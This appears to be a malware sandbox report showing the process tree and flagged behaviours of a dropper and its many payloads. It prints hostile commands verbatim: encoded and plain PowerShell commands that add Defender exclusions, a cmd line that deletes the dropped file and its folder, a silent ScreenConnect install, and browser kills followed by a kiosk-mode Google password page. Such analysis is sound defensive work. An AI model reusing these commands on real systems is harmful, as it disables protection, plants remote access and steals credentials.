4828 wrote to memory of 4936 4828 NN9Dd7c.exe 110 PID 4828 wrote to memory of 4936 4828 NN9Dd7c.exe 110 PID 4828 wrote to memory of 3932 4828 NN9Dd7c.exe 111 PID 4828 wrote to memory of 3932 4828 NN9Dd7c.exe 111 PID 2700 wrote to memory of 3008 2700 skotes.exe 113 PID 2700 wrote to memory of 3008 2700 skotes.exe 113 PID 2700 wrote to memory of 3008 2700 skotes.exe 113 PID 2700 wrote to memory of 1492 2700 skotes.exe 115 PID 2700 wrote to memory of 1492 2700 skotes.exe 115 PID 2700 wrote to memory of 1492 2700 skotes.exe 115 PID 4936 wrote to memory of 2656 4936 11330f815f134a4cbe5bb3c2715f831b.exe 117 PID 4936 wrote to memory of 2656 4936 11330f815f134a4cbe5bb3c2715f831b.exe 117 PID 4936 wrote to memory of 2656 4936 11330f815f134a4cbe5bb3c2715f831b.exe 117 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 1492 wrote to memory of 2044 1492 8ZVMneG.exe 119 PID 2656 wrote to memory of 3544 2656 cmd.exe 120 PID 2656 wrote to memory of 3544 2656 cmd.exe 120 PID 2656 wrote to memory of 3544 2656 cmd.exe 120 PID 3932 wrote to memory of 5104 3932 9852e08b3ce14c9f8e5ee5c68d6659c7.exe 121 PID 3932 wrote to memory of 5104 3932 9852e08b3ce14c9f8e5ee5c68d6659c7.exe 121 PID 5104 wrote to memory of 1868 5104 msedge.exe 123 PID 5104 wrote to memory of 1868 5104 msedge.exe 123 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 PID 5104 wrote to memory of 4540 5104 msedge.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2196 attrib.exe 412 attrib.exe 2072 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2848
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6448
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3444
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\vnmpejhr"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
C:\vnmpejhr\11330f815f134a4cbe5bb3c2715f831b.exe"C:\vnmpejhr\11330f815f134a4cbe5bb3c2715f831b.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\vnmpejhr\11330f815f134a4cbe5bb3c2715f831b.exe" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3544
-
-
-
-
C:\vnmpejhr\9852e08b3ce14c9f8e5ee5c68d6659c7.exe"C:\vnmpejhr\9852e08b3ce14c9f8e5ee5c68d6659c7.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff224f46f8,0x7fff224f4708,0x7fff224f47187⤵PID:1868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:27⤵PID:4540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:3092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:87⤵PID:2196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:17⤵PID:4888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:17⤵PID:3552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:17⤵PID:5220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:17⤵PID:972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:87⤵PID:5556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:5856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:17⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:17⤵PID:5204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9931314435723803081,14263853436212170411,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2044 /prefetch:17⤵PID:2168
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"5⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4708
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUA5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018024001\74ea13a73f.exe"C:\Users\Admin\AppData\Local\Temp\1018024001\74ea13a73f.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\1018058001\82f750008c.exe"C:\Users\Admin\AppData\Local\Temp\1018058001\82f750008c.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\1018058001\82f750008c.exe"C:\Users\Admin\AppData\Local\Temp\1018058001\82f750008c.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5008
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018059001\df80c5b067.exe"C:\Users\Admin\AppData\Local\Temp\1018059001\df80c5b067.exe"4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\1018060001\7fec148bf7.exe"C:\Users\Admin\AppData\Local\Temp\1018060001\7fec148bf7.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\1018061001\c405ac4557.exe"C:\Users\Admin\AppData\Local\Temp\1018061001\c405ac4557.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\1018062001\0200dc27b8.exe"C:\Users\Admin\AppData\Local\Temp\1018062001\0200dc27b8.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\1018062001\0200dc27b8.exe"C:\Users\Admin\AppData\Local\Temp\1018062001\0200dc27b8.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4240
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018063001\2cd8483345.exe"C:\Users\Admin\AppData\Local\Temp\1018063001\2cd8483345.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\1018063001\2cd8483345.exe"C:\Users\Admin\AppData\Local\Temp\1018063001\2cd8483345.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018064001\e77a85cbca.exe"C:\Users\Admin\AppData\Local\Temp\1018064001\e77a85cbca.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5524
-
-
C:\Users\Admin\AppData\Local\Temp\1018065001\1759409732.exe"C:\Users\Admin\AppData\Local\Temp\1018065001\1759409732.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\hgveckxwk"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5840
-
-
C:\hgveckxwk\efa7459f98b841dcbf8cc6e8b586c1a6.exe"C:\hgveckxwk\efa7459f98b841dcbf8cc6e8b586c1a6.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\hgveckxwk\efa7459f98b841dcbf8cc6e8b586c1a6.exe" & rd /s /q "C:\ProgramData\5F3OHLFUK6F3" & exit6⤵
- System Location Discovery: System Language Discovery
PID:5500 -
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5184
-
-
-
-
C:\hgveckxwk\9140c03f1375498d9cf519530df567a1.exe"C:\hgveckxwk\9140c03f1375498d9cf519530df567a1.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:5328 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi6⤵PID:2188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xc4,0x108,0x7fff224f46f8,0x7fff224f4708,0x7fff224f47187⤵PID:808
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018066001\bff0f77eae.exe"C:\Users\Admin\AppData\Local\Temp\1018066001\bff0f77eae.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\1018067001\5fac2d9081.exe"C:\Users\Admin\AppData\Local\Temp\1018067001\5fac2d9081.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6104
-
-
C:\Users\Admin\AppData\Local\Temp\1018068001\72ca34675a.exe"C:\Users\Admin\AppData\Local\Temp\1018068001\72ca34675a.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6848 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6984
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:5000
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4084 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ceb2b2a-3ee8-486f-81d0-83ba1e0d0de9} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" gpu7⤵PID:6360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08af2cde-ee6f-4f56-958e-3dbbfe17f725} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" socket7⤵PID:6052
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3124 -childID 1 -isForBrowser -prefsHandle 2976 -prefMapHandle 3136 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {931cf0b4-038a-47c2-b7b8-f9e1ac3b3164} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" tab7⤵PID:6852
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4000 -childID 2 -isForBrowser -prefsHandle 4024 -prefMapHandle 4020 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3a064ba-68be-4a30-aed0-5f5a3f541a34} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" tab7⤵PID:6296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4852 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4844 -prefMapHandle 4840 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dfaa134-760d-4436-9994-2d07e1fe664e} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" utility7⤵
- Checks processor information in registry
PID:5580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5292 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 3992 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9671a089-e684-4745-805a-b088c8ca3352} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" tab7⤵PID:3644
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 4 -isForBrowser -prefsHandle 5432 -prefMapHandle 5436 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {117b2551-2bfc-4ed0-9808-4767517048bf} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" tab7⤵PID:3076
-
-
